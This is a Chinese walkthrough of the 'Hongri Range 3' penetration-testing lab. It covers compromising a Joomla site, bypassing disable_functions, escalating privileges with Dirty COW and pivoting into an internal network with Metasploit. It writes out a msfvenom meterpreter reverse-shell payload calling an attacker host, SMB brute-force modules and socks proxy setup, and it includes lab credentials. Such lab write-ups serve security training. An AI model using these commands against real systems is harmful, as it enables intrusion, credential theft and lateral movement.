红日靶场3
最好一次性打完,centos重新开机可能会退出登录
centos重新获取NAT模式网卡ip:service network restart
ifdown eth0 ifup eth0
出网ip: 192.168.163.128
采用了Joomla的CMS,直接用kali自带工具joomscan进行扫描,发现
http://192.168.163.128/administrator/
http://192.168.163.128/configuration.php~
找到账号密码后登录
登录后发现joomla后台登录的账号和密码,修改密码
发现无论输入任何指令,返回的信息 只有 ret=127,猜测使用了disable_functions,使用专门的插件绕过
拿到192.168.93.120的ubuntu 机器的权限
拿到了Centos的shell,执行命令返回的是Ubuntu(web1)的信息,说明Centos是Ubuntu的反向代理
正向代理和反向代理的区别虽然正向代理服务器和反向代理服务器所处的位置都是客户端和真实服务器之间,所做的事情也都是把客户端的请求转发给服务器,再把服务器的响应转发给客户端,但是二者之间还是有一定的差异的。1、正向代理其实是客户端的代理,帮助客户端访问其无法访问的服务器资源。反向代理则是服务器的代理,帮助服务器做负载均衡,安全防护等。2、正向代理一般是客户端架设的,比如在自己的机器上安装一个代理软件。而反向代理一般是服务器架设的,比如在自己的机器集群中部署一个反向代理服务器。3、正向代理中,服务器不知道真正的客户端到底是谁,以为访问自己的就是真实的客户端。而在反向代理中,客户端不知道真正的服务器是谁,以为自己访问的就是真实的服务器。4、正向代理和反向代理的作用和目的不同。正向代理主要是用来解决访问限制问题。而反向代理则是提供负载均衡、安全防护等作用。二者均能提高访问速度。发现一组账号密码:wwwuser:wwwuser_123Aqx,ssh登录,拿到Centos普通用户 权限
脏牛提权
MSF
Kali (MSF)↓ 反弹
CentOS (root + meterpreter)↓ pivot
192.168.93.0/24 域内其他主机先生成一个shellcode
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.111.132 LPORT=7890 -f elf > mshell.elf
将mshell.elf传到Centos上,然后启动监听
主机探测
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit
发现存在192.168.93.10,192.168.93.20,192.168.93.30三台主机
进行弱口令爆破
use auxiliary/scanner/smb/smb_login
set SMBUSER administrator
set PASS_FILE /root/pass.txt
set rhosts 192.168.93.20
run
得到密码zxcASDqw123!!
路由转发Sock代理
路由转发只能将msfconsole带进内网,而要想将攻击机上的其他攻击程序也带进内网还需要搭建socks代理。
添加路由
route add 0.0.0.0 0.0.0.0 1
搭建Socks4a代理
use auxiliary/server/socks4a
set SRVHOST 0.0.0.0
set SRVPORT 1080
run
搭建Socks5代理
use auxiliary/server/socks5
set SRVHOST 0.0.0.0
set SRVPORT 1080
set USERNAME root
set PASSWORD Password@
run